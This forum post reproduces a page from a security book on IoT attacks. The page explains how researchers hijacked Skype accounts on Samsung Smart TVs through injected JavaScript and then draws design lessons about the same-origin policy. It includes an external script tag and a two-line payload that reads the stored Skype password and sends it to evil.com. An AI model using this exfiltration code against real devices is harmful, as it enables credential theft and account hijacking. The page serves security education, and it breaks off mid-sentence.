Abusing the Internet of Things

(Rick Simeone) #1
TIP

exeDSP processes handle all the functionality of the TV. This is actually a security bug in the
way Samsung modified the JavaScript interpreter.
The researchers took things further with a scenario in which the mood message of the
malicious Skype user was the following:


<script src="http://tv.isecpartners.com/exfil.js"></script>

Now assume exfil.js contains JavaScript code like this:

creds = PluginAPIMgr.GetMyStorageInfo();
new Image().src="http://evil.com/"+creds;

The researchers found that the GetMyStorageInfo() call actually returned the value of the
user’s Skype password in clear text. This malicious code then sends the credentials to the
evil.com server as a parameter. The attacker, who owns evil.com, can then look at the web
server logs to note the password. At this point, the attacker can quickly log into Skype and
hijack the victim’s account.
Grattafiori and Yavor have found multiple exploitable conditions such as this issue with
Skype. Web browser designers have learned the hard way to sandbox client-side code such as
JavaScript and respect the same-origin policy. These are fundamental and well-known security
concepts in the world of web security. Samsung’s implementation is counter to this funda-
mental security principle. JavaScript code loaded from external domains should not be
allowed to execute with the same privileges as that of code loaded from the local filesystem.
Furthermore, the tweaking of the JavaScript interpreter to introduce custom functionality
should be carefully designed to make sure no security bugs are being introduced. The lesson
to be learned from this example is that security fundamentals such as validation of data and
adherence to same-origin policies are basic security requirements that ought to be baked into
the design of Smart TVs and other IoT devices. These are not complex attacks, and they are
based on attack vectors the industry has known about for more than a decade.


Various other researchers have found additional flaws in Samsung Smart TVs that exploit basic secu-
rity mechanisms, including input validation. One notable researcher in this field is SeungJin Lee, who,
along with Seungjoo Kim, found and reported multiple vulnerabilities to Samsung. Their research is worth
reading and available online.

IoT device manufacturers such as Samsung definitely need to do a better job of imple-
menting these basic principles to protect their business as well as the privacy of their loyal
customers. A simple attack like this can be exploited to install a persistent backdoor on a
Smart TV, allowing the attacker to continuously steal credentials and even remotely view the


UNDERSTANDING AND EXPLOITING THE APP WORLD 145
Free download pdf